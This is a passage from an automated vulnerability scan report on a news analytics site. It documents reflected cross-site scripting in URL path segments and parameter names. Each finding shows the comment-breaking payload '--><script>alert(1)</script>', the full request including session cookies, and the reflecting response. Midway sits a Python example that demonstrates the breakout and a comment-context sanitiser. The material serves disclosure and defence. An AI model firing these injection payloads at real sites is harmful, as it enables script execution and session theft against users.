High
Confidence:
Certain
Host:
http://analytics.informationweek.com
Path:
/menu/104/Government/Government.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload bf725--><script>alert(1)</script>b4e47d4b98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/104/Government/Government.html?bf725--><script>alert(1)</script>b4e47d4b98=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... nment%2FGovernment.html%3Fbf725--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb4e47d4b98%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/104/Government/Government.html?bf725--><script>alert(1)</script>b4e47d4b98=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 71898--><script>alert(1)</script>7193a7d29ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu71898--><script>alert(1)</script>7193a7d29ad/105/Healthcare/Healthcare.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:00 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:00 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... formationweek.com%2Fmenu71898--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7193a7d29ad%2F105%2FHealthcare%2FHealthcare.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu71898--><script>alert(1)</script>7193a7d29ad/105/Healthcare/Healthcare.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 54cf2--><script>alert(1)</script>109941c14ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/10554cf2--><script>alert(1)</script>109941c14ca/Healthcare/Healthcare.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:12 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:12 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ationweek.com%2Fmenu%2F10554cf2--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E109941c14ca%2FHealthcare%2FHealthcare.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/10554cf2--><script>alert(1)</script>109941c14ca/Healthcare/Healthcare.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload a6df7--><script>alert(1)</script>5ba8d7732fd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/105/Healthcarea6df7--><script>alert(1)</script>5ba8d7732fd/Healthcare.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:19 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:19 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... om%2Fmenu%2F105%2FHealthcarea6df7--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E5ba8d7732fd%2FHealthcare.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/105/Healthcarea6df7--><script>alert(1)</script>5ba8d7732fd/Healthcare.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload fec08--><script>alert(1)</script>8c1aeff968c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/105/Healthcare/Healthcare.htmlfec08--><script>alert(1)</script>8c1aeff968c HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:30 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:31 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 2FHealthcare%2FHealthcare.htmlfec08--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E8c1aeff968c&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/105/Healthcare/Healthcare.htmlfec08--><script>alert(1)</script>8c1aeff968c"> ...[SNIP]...
3.60. http://analytics.informationweek.com/menu/105/Healthcare/Healthcare.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://analytics.informationweek.com
Path:
/menu/105/Healthcare/Healthcare.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ecec8--><script>alert(1)</script>296d0d5c564 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/105/Healthcare/Healthcare.html?ecec8--><script>alert(1)</script>296d0d5c564=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... care%2FHealthcare.html%3Fecec8--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E296d0d5c564%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/105/Healthcare/Healthcare.html?ecec8--><script>alert(1)</script>296d0d5c564=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 35762--><script>alert(1)</script>26950b9f17e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu35762--><script>alert(1)</script>26950b9f17e/106/Financial/Financial.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 02:11:24 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 16:11:24 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45905
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... informationweek.com%2Fmenu35762--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E26950b9f17e%2F106%2FFinancial%2FFinancial.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu35762--><script>alert(1)</script>26950b9f17e/106/Financial/Financial.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload a80e4--><script>alert(1)</script>b9fe4f616f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/106a80e4--><script>alert(1)</script>b9fe4f616f3/Financial/Financial.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 02:11:33 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 16:11:33 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45905
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... rmationweek.com%2Fmenu%2F106a80e4--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb9fe4f616f3%2FFinancial%2FFinancial.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/106a80e4--><script>alert(1)</script>b9fe4f616f3/Financial/Financial.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 3bdd8--><script>alert(1)</script>74351014ad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/106/Financial3bdd8--><script>alert(1)</script>74351014ad/Financial.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 02:11:50 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 16:11:50 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45903
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ek.com%2Fmenu%2F106%2FFinancial3bdd8--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E74351014ad%2FFinancial.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/106/Financial3bdd8--><script>alert(1)</script>74351014ad/Financial.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 9221b--><script>alert(1)</script>bde86b314b0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/106/Financial/Financial.html9221b--><script>alert(1)</script>bde86b314b0 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 02:12:28 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 16:12:28 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45905
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 106%2FFinancial%2FFinancial.html9221b--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebde86b314b0&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/106/Financial/Financial.html9221b--><script>alert(1)</script>bde86b314b0"> ...[SNIP]...
3.65. http://analytics.informationweek.com/menu/106/Financial/Financial.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://analytics.informationweek.com
Path:
/menu/106/Financial/Financial.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b1f78--><script>alert(1)</script>119c5ed8843 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/106/Financial/Financial.html?b1f78--><script>alert(1)</script>119c5ed8843=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... nancial%2FFinancial.html%3Fb1f78--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E119c5ed8843%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/106/Financial/Financial.html?b1f78--><script>alert(1)</script>119c5ed8843=1"> ...[SNIP]...
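The Remediation detail repeated above states that reflecting user data inside an HTML comment is not a defence, because the payload's leading --> simply closes the comment. The following Python is an added example, not code from the report or from the audited application: it models the reflection with a constructed template (an assumption about the page's markup, since the report only shows a snipped response), shows that a standard HTML parser treats the injected <script> as real markup, and contrasts that with a comment-context sanitiser. Entity encoding is useless here because browsers do not decode entities inside comments, so the sanitiser removes every character that could form a comment terminator (--> or --!>) or open a tag after a break-out. The probe string is the one from finding 3.55 above; html_comment_safe, render_vulnerable, render_hardened and script_breaks_out are names chosen for this example.

```python
from html.parser import HTMLParser

# Probe taken from finding 3.55 in the report (request line, path and query).
PROBE = "/menu/104/Government/Government.html?bf725--><script>alert(1)</script>b4e47d4b98=1"


def render_vulnerable(request_path: str) -> str:
    """Constructed model of the reflection: the request URL is written verbatim
    into an HTML comment (an assumption about the real page's template)."""
    return (
        "<html><body>\n"
        "<!-- successfulLoginRedirect=http://analytics.informationweek.com"
        + request_path
        + " -->\n<p>Not found</p></body></html>"
    )


def html_comment_safe(value: str) -> str:
    """Make a string safe to place inside an HTML comment.

    Comment text is never entity-decoded, so escaping cannot help; the only
    option is to remove the characters that can end the comment ("-->" and
    the spec's "--!>" form) or start a tag once the comment is closed.
    Dropping "-", "<", ">" and "!" makes both impossible. The better fix is
    not to echo user-controlled data into comments at all.
    """
    return "".join(ch for ch in value if ch not in "-<>!")


def render_hardened(request_path: str) -> str:
    """Same template, but the reflected value goes through the sanitiser."""
    return render_vulnerable(html_comment_safe(request_path))


class _TagCollector(HTMLParser):
    """Records start tags and comment bodies as the parser sees them."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.comments: list[str] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        self.tags.append(tag)

    def handle_comment(self, data: str) -> None:
        self.comments.append(data)


def script_breaks_out(html: str) -> bool:
    """True if a <script> element is parsed as live markup, i.e. the payload
    escaped the comment context rather than staying inert inside it."""
    parser = _TagCollector()
    parser.feed(html)
    parser.close()
    return "script" in parser.tags


if __name__ == "__main__":
    print("vulnerable page executes script:", script_breaks_out(render_vulnerable(PROBE)))
    print("hardened page executes script:  ", script_breaks_out(render_hardened(PROBE)))
    print("benign path executes script:    ",
          script_breaks_out(render_vulnerable("/menu/104/Government/Government.html")))
```

Run it and the vulnerable rendering reports True while the hardened one reports False: the parser closes the comment at the probe's --> and then treats <script>alert(1)</script> as an ordinary script element, which is exactly what the browser does with the report's 404 responses. Note that the same check fires regardless of which of the four REST URL segments or the parameter name carries the payload, since all of them end up in the same reflected URL.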
The value of REST URL parameter 1 is copied into an HTML comment. The payload 280d2--><script>alert(1)</script>7fd66fc442e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu280d2--><script>alert(1)</script>7fd66fc442e/13/Outsourcing-and-services/Outsourcing-services.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:32 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:32 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... u280d2--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7fd66fc442e%2F13%2FOutsourcing-and-services%2FOutsourcing-services.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu280d2--><script>alert(1)</script>7fd66fc442e/13/Outsourcing-and-services/Outsourcing-services.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload f5cfa--><script>alert(1)</script>bc24ee3df37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/13f5cfa--><script>alert(1)</script>bc24ee3df37/Outsourcing-and-services/Outsourcing-services.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:44 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:44 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... F13f5cfa--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebc24ee3df37%2FOutsourcing-and-services%2FOutsourcing-services.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/13f5cfa--><script>alert(1)</script>bc24ee3df37/Outsourcing-and-services/Outsourcing-services.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 9e007--><script>alert(1)</script>d20170e2eff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
